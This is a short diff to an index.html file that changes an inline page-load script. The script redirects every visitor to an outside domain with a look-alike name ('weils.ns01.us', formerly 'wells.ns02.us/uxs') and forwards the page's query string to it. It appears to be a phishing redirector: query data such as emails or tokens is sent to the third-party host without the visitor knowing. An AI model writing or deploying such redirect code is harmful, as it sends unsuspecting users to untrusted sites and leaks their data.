--- a/index.html
+++ b/index.html
@@ -1,5 +1,5 @@
 <script>
-    var myurl = ('https://wells.ns02.us/uxs')
+    var myurl = ('https://weils.ns01.us')
     var holdbeer = (window.location.search);
     window.location.replace(myurl+'/'+holdbeer);
 </script>
